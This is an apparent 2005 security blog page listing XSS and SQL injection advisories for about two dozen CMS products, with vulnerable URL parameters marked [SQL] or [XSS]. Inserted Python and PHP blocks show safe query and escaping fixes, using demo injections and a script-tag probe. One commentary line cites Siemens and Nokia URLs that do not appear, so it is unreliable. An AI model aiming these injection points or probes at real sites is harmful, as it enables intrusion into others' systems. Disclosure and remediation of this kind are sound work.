    We still need Spanish and German help for the board; the board will be in English (main) and Latvian, Russian, Spanish (I hope), German (I hope). Other languages and specialists are also welcome.
    I know that many previous members can't wait to join the community board, but sorry, everything is in maintenance and we will be back only in 2006 :)

    NQcontent V3 XSS vuln.

    Vuln. discovered by : r0t
    Date: 19 dec. 2005
    vendor:http://www.nqcontent.com/
    affected version:V3 Professional Edition,V3 Enterprise Edition,V3 Comparison Matrix.

    Product Description:

    NQcontent is a dynamic web content management system that extends traditional CMS capabilities to include a powerful application development and integration framework. NQcontent will revolutionise the speed and ease of delivery of your internet, intranet, extranet and portals, seamlessly integrating and future proofing your online investment.



    Vuln. Description:

    NQcontent contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    MMBase XSS vuln.

    Vuln. discovered by : r0t
    Date: 19 dec. 2005
    vendor:http://www.mmbase.org/
    affected version: 1.7.4 and prior


    Product Description:

    Open source object oriented Java based enterprise content management system. Platform independent: all major operating systems (Windows, Unix, Linux), databases (Oracle, DB2, Informix, MSSQL, MySQL, PostgreSQL) and servlet containers (Tomcat, Orion, and J2EE application servers like JBoss, Jonas, IBM Websphere, BEA weblogic).


    Vuln. Description:

    MMBase contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Miraserver SQL vuln.

    Vuln. discovered by : r0t
    Date: 19 dec. 2005
    vendor:http://www.miraserver.com
    affected version: Miraserver v.1.0 RC4 and prior


    Product Description:

    MiraServer is a content management system aimed to ease the task of web content delivery and management for large content portals, but has the flexibility to handle smaller sites as well. It can handle web pages, articles, news headlines and FAQs. Among its features are WYSIWYG editing, integrated user comment system, optional vBulletin integration, full template-control system, file attachments and much more.



    Vuln. Description:


    Miraserver contains a flaw that allows remote SQL injection attacks. Input passed to the "page" parameter in "index.php", the "id" parameter in "newsitem.php" and the "cat" parameter in "article.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:

    /index.php?page=[SQL]
    /newsitem.php?id=[SQL]
    /article.php?cat=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Sunday, December 18, 2005

    Mercury CMS™ vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.mercury-cms.com
    affected version:4.0 and prior


    Product Description:

    Mercury CMS™ v4.0 is an extensible, modular, enterprise-level content management system at entry-level costs. The four Editions of the CMS - Lite, Professional, Portal and E-Commerce - provide complete set of functionality to satisfy the business needs of our clients. Mercury CMS™ allows non-technical personnel to manage and edit content using secure and easy to use, browser-based interfaces.
    We designed the Mercury CMS™ v4.0 to provide maximum aesthetic flexibility by utilizing custom templates and multi-level styling. What makes this CMS unique are features like parallel editing, content granulation where pages are containers and content is organized in sections, snippets, modules; site is organized in areas (public, intranet, extranet, hidden); meta tags, styles, and repeating content are configured on multiple levels (global, area, page); and more.
    Flexible extensibility provides secure integration with third party and custom applications.
    The Architecture of Mercury CMS™ v4.0 allows for the inclusion of additional modules and technologies as you require them. There are more than 40 modules currently available for the system and this number constantly grows. We give you 17 of those modules for free to get you started fast and at very low cost.

    Vuln. Description:

    SQL.
    Mercury CMS™ contains a flaw that allows remote SQL injection attacks. Input passed to the "page" parameter in "index.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    /index.cfm?page=[SQL]


    XSS.
    Mercury CMS™ contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "content" and "criteria" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    /index.cfm?page=40&criteria=&start=11&title=&content=[XSS]

    /index.cfm?restricted=false&page=10&criteria=[XSS]



    Solution:
    Edit the source code to ensure that input is properly sanitised.
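    The recurring fix in these advisories, "ensure that input is properly sanitised", shown in working form for both flaw classes: the `page=[SQL]` pattern and a reflected search term. This is an added Python example, not code from any vendor named here (their products are PHP, ColdFusion or Java); the `pages` table, its titles and the function names are constructed for the demonstration. Note that the `%22%3E%3Cscript%3E` probes in the Siemens and Nokia URLs above open with `">` to break out of a quoted attribute, so the output encoding must cover quotes, not just angle brackets.

```python
import html
import sqlite3
from urllib.parse import parse_qs, urlsplit


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a CMS 'pages' table (not any vendor's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO pages VALUES (?, ?, ?)",
        [(10, "Home", 1), (40, "Products 100% tested", 1),
         (41, "Products 1000 units", 1), (99, "Draft pricing", 0)],
    )
    return conn


def page_title_unsafe(conn: sqlite3.Connection, page: str) -> list:
    """The pattern behind '/index.php?page=[SQL]': the raw parameter is pasted
    into the SQL text, so its content can rewrite the WHERE clause."""
    sql = "SELECT id, title FROM pages WHERE published = 1 AND id = " + page
    return conn.execute(sql).fetchall()


def page_title_safe(conn: sqlite3.Connection, page: str) -> list:
    """Hardened form: validate the type first, then bind the value as a
    parameter; a non-integer 'page' never reaches the database at all."""
    try:
        page_id = int(page)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, title FROM pages WHERE published = 1 AND id = ?", (page_id,)
    ).fetchall()


def escape_like(term: str) -> str:
    """Binding alone does not stop '%' and '_' acting as LIKE wildcards in a
    free-text search, so they are escaped too (paired with ESCAPE '\\' below)."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_titles(conn: sqlite3.Connection, query: str) -> list:
    """Search-module lookup with the user's term bound, never concatenated."""
    pattern = "%" + escape_like(query) + "%"
    return conn.execute(
        "SELECT id, title FROM pages WHERE published = 1 AND title LIKE ? ESCAPE '\\' "
        "ORDER BY id",
        (pattern,),
    ).fetchall()


def render_results(query: str, rows: list) -> str:
    """Reflect the search term with html.escape(quote=True): the double quote
    becomes &quot; so a term starting with "> cannot close the value attribute,
    which is what the %22%3E%3Cscript%3E probes in the advisories depend on."""
    q = html.escape(query, quote=True)
    items = "".join(f"<li>{html.escape(t, quote=True)}</li>" for _, t in rows)
    return (f'<form><input name="query" value="{q}"></form>'
            f"<p>Results for {q}:</p><ul>{items}</ul>")


def handle_search_url(conn: sqlite3.Connection, url: str) -> str:
    """End to end for a request such as '/search.html?query=...': URL-decode,
    query with a bound parameter, render with output encoding."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    query = params.get("query", [""])[0]
    return render_results(query, search_titles(conn, query))


if __name__ == "__main__":
    db = build_demo_db()
    print(page_title_unsafe(db, "99 OR 1=1"))   # every row, including the unpublished draft
    print(page_title_safe(db, "99 OR 1=1"))     # [] : rejected before any query runs
    print(search_titles(db, "100%"))            # only the title containing a literal '%'
    print(handle_search_url(db, "/search.html?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"))
```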

    Marwel SQL inj.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:www.qcm.cz
    affected version:2.7 and prior

    Vuln. Description:

    Marwel contains a flaw that allows remote SQL injection attacks. Input passed to the "show" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    /index.php?show=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Magnolia XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.magnolia.info
    affected version:2.1 and prior

    Product Description:

    Magnolia is the free, open source, J2EE deployable content management system (CMS) developed by obinary. Magnolia is written in Java and uses the upcoming standard API for Java-based content repositories (JCR) to access its content. It has an easy to use web-browser interface, a clear API and a useful custom tag library for easy templating in JSP and Servlets.
    Magnolia is the first open-source content-management-system (CMS) which has been built from scratch to support the upcoming standard API for java content repositories (JCR).
    Its main goal is ease of use for all parties involved in running a CMS.
    Magnolia is distributed as a double-clickable binary installer. It includes everything you need to get you started with a standalone installation in less than 10 minutes. Magnolia runs on all common operating-systems (JDK 1.4.1 or later required). No additional software or databases are needed.
    Magnolia Content Management features a very flexible structure, platform-independence through the use of Java and XML, a simple to use API, easy templating through the use of JSP, JSTL and a custom tag library, automatic administrative UI generation, transparent and uniform data access to multiple data repositories, easy configuration through XML, easy application integration and easy deployment with professional staging on any J2EE Server.
    Magnolia is actively being developed by obinary. It is available free of charge as an open source product. We provide a binary download based on tomcat for easy deployment on Mac OS X, Windows, Linux and Solaris.


    Vuln. Description:

    Magnolia contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "query" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search.html?query=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Lutece XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://lutece.paris.fr
    affected version:1.2.3 and prior

    Product Description:

    Lutece is a web portal engine that lets you quickly create internet or intranet dynamic sites based on HTML, XML or database contents. This Open Source software is written in Java and mainly based on Apache Software Foundation (Jakarta and XML projects). Lutece runs as well under Linux or Windows platforms. The default database is MySQL. Lutece provides a very simple administration interface that can be used directly by end users without any technical skills. Lutece is free software, distributed under a BSD like license.

    Vuln. Description:

    Lutece contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Lighthouse CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.lighthouse-cms.de/en/
    affected version:1.1.0 and prior


    Product Description:

    Lighthouse is a modern, user friendly, high performance Content Management System. Lighthouse lets you create and manage web applications intuitively.
    Lighthouse allows you easy access and effective management of your web presence. Lighthouse enables you to put Enterprise Content Management to use for your business. With its modular structure, it offers you exactly the features you need, saving you time and money.
    Lighthouse is at home on all major platforms and can be used with a wide range of databases.

    Vuln. Description:

    Lighthouse contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "search" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    /?search=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Liferay Portal Enterprise 3.6.1 XSS

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://liferay.com/
    affected version:3.6.1 and prior

    Product Description:

    One of the leading open-source portal servers with a flexible, business-friendly license, Liferay is truly open source and doesn't lock you in to a specific vendor's database or application server. We also have a dedicated team of developers and consultants to complement our product with support, training, and professional services. We are one of the most mature products in the portal space and have complemented our existing CMS functionality with a slew of new features in version 3.6.1 that make integration of portal and CMS applications easier than ever. Liferay Portal ships with more portlets out of the box than any other portal platform. It can be run on a servlet container or a full-blown J2EE application server.

    Vuln. Description:

    Liferay Portal Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "_77_struts_action", "p_p_mode" and "p_p_state" parameters and to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=maximized&p_p_mode=view&p_p_col_order=null&p_p_col_pos=2&p_p_col_count=3&_77_struts_action=[XSS]


    /web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=maximized&p_p_mode=[XSS]


    /web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=[XSS]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Libertas Enterprise CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.libertas-solutions.com/
    affected version:3.0 and prior

    Product Description:

    Libertas Enterprise Content Management Server is used by larger organisations and government departments. Standards compliance is core to this CMS product with Dublin Core, eGifs, eForms, UK Government Access Keys and support for numerous XML standards. The system's n-tier architecture is highly scalable ensuring maximum availability. The interface is exceptionally easy to use, requiring limited training for staff already familiar with popular word processing applications. Like all Libertas Solutions suite of CMS products, creating accessible websites is fundamental with tools to ensure WAI / section 508 compliant sites.


    Vuln. Description:

    Libertas Enterprise CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "page_search" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search/index.php?advanced=0&associated_list=&page=1&search=0&page_search=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    damoon® XSS vuln

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.mindroute.us/?id=2452
    affected version: latest


    Vuln. Description:

    damoon® contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    lemoon® XSS vuln

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.mindroute.us/?id=426
    affected version: 2.0 and prior


    Product Description:

    lemoon® is a fully packaged CM software solution that combines simplicity with versatility. It requires no third party licenses and thus offers a very competitive price. A free demo is available. Customers using lemoon® include Sony Ericsson, Precise Biometrics, Q-MATIC, AudioDev, Pharmadule Emtunga and more.

    Vuln. Description:

    lemoon® contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Komodo CMS vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.komodocms.com/
    affected version:v2.1 and prior; other editions may have the same vuln.


    Product Description:

    Intuitive, simple-to-use and powerful web content management system. Cross browser and cross platform, Komodo CMS has been developed to give control back to organizations, empowering them to maintain and manage their web infrastructure. Komodo CMS is particularly suitable for organizations who see their website as a marketing and business generation channel. Why compromise on design or ease of use when you can have both? Komodo CMS purchase price includes design integration and training.


    Vuln. Description:

    1. SQL inj.

    Komodo CMS contains a flaw that allows remote SQL injection attacks. Input passed to the "page" parameter in "page.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:

    /page.php?page=[SQL]

    Note: For testing or exploiting this vuln., switch off JavaScript support in your browser, because on an error Komodo answers with a redirect :)


    2. XSS

    Komodo CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ODFaq SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 18 dec. 2005
    vendor:http://www.oodie.com/project/odfaq/
    affected version: 2.1.0 and prior

    Product Description:

    PHP application that allows you to manage frequently asked questions. You can create/edit/delete entries using user-friendly web based interface.

    Vuln. Description:

    ODFaq contains a flaw that allows remote SQL injection attacks. Input passed to the "cat" and "srcText" parameters in "faq.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:

    /faq.php?cat=1[SQL]

    /faq.php?p=search&srcText=r0t[SQL]&submit=Go&cat_id=&srcWhat=&dosearch=1

    Solution:
    Edit the source code to ensure that input is properly sanitised.
    ----------------------------------------------------------------
    PS. greetings to OSVDB bloggers :)

    Saturday, December 17, 2005

    Hot Banana XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:www.hotbanana.com/products/web-content-management-suite/
    affected version: 5.3 and prior

    Description:

    Founded in 1999, Hot Banana powers Web sites for more than 180 companies worldwide. Designed for non-technical users, Hot Banana is a full-fledged Web Content Management Suite that manages the content creation and delivery process of a Web site. The Hot Banana Active Marketing Web Content Management Suite consists of the end-to-end integration of Web Content Management, Internet marketing, search engine optimization - SEO, and WebTrends 7.5 Web analytics. Hot Banana is an ideal Web site solution for online branding, corporate communications, lead generation & conversion campaigns, customer retention, PR, and event marketing programs. Hot Banana is available as Hot Banana On-Demand (Software-as-a-Service (SaaS)), or as Hot Banana Licensed. Clients include; Algoma Steel, Bell Industries, Parents Action for Children, Ansell Healthcare Europe, World Vision, Beaver Vending, Los Alamos School Board (New Mexico), Law Society of Upper Canada, Expertech, and The County of Simcoe. Hot Banana Software Inc. is profitable and privately held. www.hotbanana.com


    Vuln. Description:

    Hot Banana contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "keywords" parameter in "index.cfm" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search/index.cfm?keywords=[XSS]&x=25&y=9

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Honeycomb Archive & Honeycomb Archive Enterprise vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.quicksquare.com/
    affected version:Honeycomb Archive 3.0 and Honeycomb Archive Enterprise


    Product Description:

    Honeycomb Archive™ is an image library service that functions as a stand-alone web site solution providing a central repository for graphics & files needed to support marketing, advertising, and sales personnel with print and web publishing needs. Industry leaders such as Master Lock® & Valvoline® rely on Honeycomb Archive™ every day to distribute the correct brand images to thousands of users from all over the world.


    Vuln. Description:

    1. Multiple SQL inj. vuln. in Honeycomb Archive and Honeycomb Archive Enterprise

    Honeycomb Archive and Honeycomb Archive Enterprise contain a flaw that allows remote SQL injection attacks. Input passed to the "series", "cat_parent", "cat" and "div" parameters in "CategoryResults.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:

    /CategoryResults.cfm?div=7&cat=118&cat_parent=107&series=[SQL]
    /CategoryResults.cfm?div=7&cat=118&cat_parent=[SQL]
    /CategoryResults.cfm?div=7&cat=[SQL]
    /CategoryResults.cfm?div=[SQL]

    2. XSS in Honeycomb Archive Enterprise search module

    Honeycomb Archive Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    FLIP XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.flipdev.org/
    affected version: 0.9.0.1029 and prior

    Product Description:

    The Free Lanparty Inter-/Intranet Portal contains CMS, Groupware and LAN-Party specific features.

    Vuln. Description:

    FLIP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "name" parameter in "text.php" and the "frame" parameter in "forum.php" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /text.php?name=[XSS]
    /forum.php?frame=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    FarCry XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://farcry.daemon.com.au/
    affected version:3.0 and prior


    Product Description:

    FarCry is an open source Content Management System (CMS), originally developed by Daemon. It's fully functional, and runs in a host of Enterprise environments today. It requires the Macromedia ColdFusion MX platform and a viable enterprise database (currently FarCry supports MSSQL, Oracle, PostgreSQL and MySQL). The solution runs on Windows 2k+ and a variety of *nix platforms (including Solaris and OSX).


    Vuln. Description:

    FarCry contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search parameters of the search module isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Esselbach Storyteller CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.esselbach.com/
    affected version: 1.8 and prior

    Product Description:

    Esselbach Storyteller CMS is a powerful Content Management System designed for high traffic websites

    Vuln. Description:

    Esselbach Storyteller CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search parameters of the search module isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    EPiX™ Search query XSS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.go-epix.net/
    affected version:3.1.2 and prior


    Product Description:

    EPIX is a low cost portal solution with CMS capabilities as well as support for JSR168 portlets. It is J2EE (Java) based and runs on any platform.

    Vuln. Description:

    EPIX contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search query parameter of the search module isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    e-publish CMS vuln.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor:http://www.e-publish.gr/
    affected version:v2.0 and prior

    Product Description:

    The e-publish web application is a content management system that is perfect for publishing newspapers, magazines or any other content over the Internet. It is very convenient to manage the contents of the site in an easy and quick way through the administration module. No special knowledge is required. e-publish integrates with a banner campaign utility. Through this service the site owner can administer any advertising banner campaign on the site. Available also in a multilingual edition.

    Vuln. Description:

    1. SQL inj.

    e-publish contains a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter in "printer_friendly.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    2. XSS

    e-publish contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "obcatid" and "comid" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /printer_friendly.cfm?id=[SQL]

    /show.cfm?id=274&obcatid=10[XSS]

    /show.cfm?id=279&how=5&obcatid=9&shfrm=1&comid=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Direct News SQL inj.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor: http://www.direct-news.net
    affected version: 4.9 and prior


    Product Description:

    Direct News 4.9 is an easy-to-use CMS based on php-mysql. Its real goal is simplicity and usability, in order to be used by all. In addition to the Wysiwyg editor, navigation management, image library and image tools, Direct News 4.9 comes with a new Macromedia Flash compatibility.
    Direct News is one of the few CMS to offer you the ability to manage your flash animation contents directly through the very easy interface of Direct News.
    Direct News improves your Search Engine Optimization by rewriting the links and allowing you to describe your content as you want.
    Of course, Direct News can manage a shopping cart, multiple language websites (with Chinese, Russian and others) and administration interfaces. Direct News is also available in a smaller, limited version.


    Vuln. Description:

    Direct News contains a flaw that allows remote SQL injection attacks. Input passed to the "setLang" parameter and to the search module parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /?setLang=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ContentServ 3.1 SQL inj.

    Vuln. discovered by : r0t
    Date: 17 dec. 2005
    vendor: http://www.contentserv.com/
    affected version: 3.1 and prior

    Product Description:

    ContentServ encompasses more than simple Content Management. It stands for Enterprise Marketing Management Solutions and a holistic approach, aimed at providing full-scale support of all marketing activities. Thus, it also includes Cross Media Publishing, Customer Relationship Management, Catalog and Product Information Management, and also Media Asset Management, to name a few. The EMMS Suite provides a highly professional solution for the creation and maintenance of content, regardless of whether it is to be published in web, print, or other forms of media. Particularly attractive are the numerous possibilities to steer and control all processes concerning content. Among these are a detailed Workflow Management, intelligent definition of user rights, Version Management, and many more. Additionally, the system is structured in a very open manner, allowing easy and seamless blending into existing system environments, and trouble-free connection with other components such as SAP or various databases. The most outstanding feature, however, lies in Cross Media Publishing. It enables the publication of content into any medium desired. This is possible through the support of over 27 exchange formats. These interfaces make ContentServ the most innovative provider of solutions for the creation, maintenance and publication of content.

    Vuln. Description:

    ContentServ contains a flaw that allows remote SQL injection attacks. Input passed to the "StoryID" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:

    /index.php?StoryID=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.
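    What "edit the source code to ensure that input is properly sanitised" amounts to for the three SQL injection flaws on this page (e-publish's "id", Direct News' "setLang", ContentServ's "StoryID"), as an added example that is not the vendors' code: the string-built query beside a PDO prepared statement with type validation, and an allowlist for a parameter that only ever takes a few legitimate values. Table and column names, the language list and the in-memory SQLite database are constructed assumptions; only the parameter names come from the advisories.

```php
<?php
// Added example, not code from Direct News, ContentServ or e-publish. Parameter
// names StoryID and setLang are from the advisories; table and column names,
// the language list and the SQLite database are constructed.
declare(strict_types=1);

// Vulnerable: the query-string value is concatenated into the SQL text, so
// whatever the client sends becomes part of the statement the server runs.
function story_vulnerable(PDO $db, array $get): array
{
    $sql = 'SELECT id, title FROM stories WHERE id = ' . ($get['StoryID'] ?? '');
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the SQL text is fixed at prepare time and the value travels
// separately, so it can only ever be compared as data. The digit check is a
// second, independent control that rejects anything that is not an id.
function story_hardened(PDO $db, array $get): array
{
    $raw = (string) ($get['StoryID'] ?? '');
    if (!ctype_digit($raw)) {
        return [];   // not a non-negative integer: nothing is queried
    }
    $stmt = $db->prepare('SELECT id, title FROM stories WHERE id = ?');
    $stmt->bindValue(1, (int) $raw, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// For a parameter such as setLang only a handful of values are legitimate, so
// an allowlist is the natural control; the query is still prepared so that the
// two defences do not depend on each other.
const LANGUAGES = ['en', 'fr', 'de', 'ru', 'zh'];   // constructed list

function language_hardened(PDO $db, array $get): ?array
{
    $lang = (string) ($get['setLang'] ?? 'en');
    if (!in_array($lang, LANGUAGES, true)) {
        $lang = 'en';   // fall back to the default rather than trust the client
    }
    $stmt = $db->prepare('SELECT code, name FROM languages WHERE code = :code');
    $stmt->execute([':code' => $lang]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demonstration against a constructed in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE stories (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO stories VALUES (1, 'first'), (2, 'second')");
$db->exec('CREATE TABLE languages (code TEXT PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO languages VALUES ('en', 'English'), ('fr', 'Francais')");

// Constructed request: StoryID is "2-1", an expression rather than an id.
$request = ['StoryID' => '2-1', 'setLang' => 'xx'];

// Vulnerable path: the database evaluates 2-1 and returns story 1, which
// shows that client-supplied text was executed as part of the statement.
print_r(story_vulnerable($db, $request));
// Hardened path: "2-1" is not a digit string, so it is rejected outright.
print_r(story_hardened($db, $request));
// A legitimate id is looked up through the bound parameter.
print_r(story_hardened($db, ['StoryID' => '2']));
// An unknown language code falls back to 'en'.
print_r(language_hardened($db, $request));
```

    The "2-1" request is deliberately harmless: it is enough to prove that the concatenated query let the client alter the statement (the database did arithmetic the application never wrote), which is the whole class of defect the advisories describe. When the backend is MySQL rather than SQLite, set PDO::ATTR_EMULATE_PREPARES to false so that parameters are bound server-side instead of being interpolated by the driver.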

    Copyright (c) 2006 Pridels Sec Crew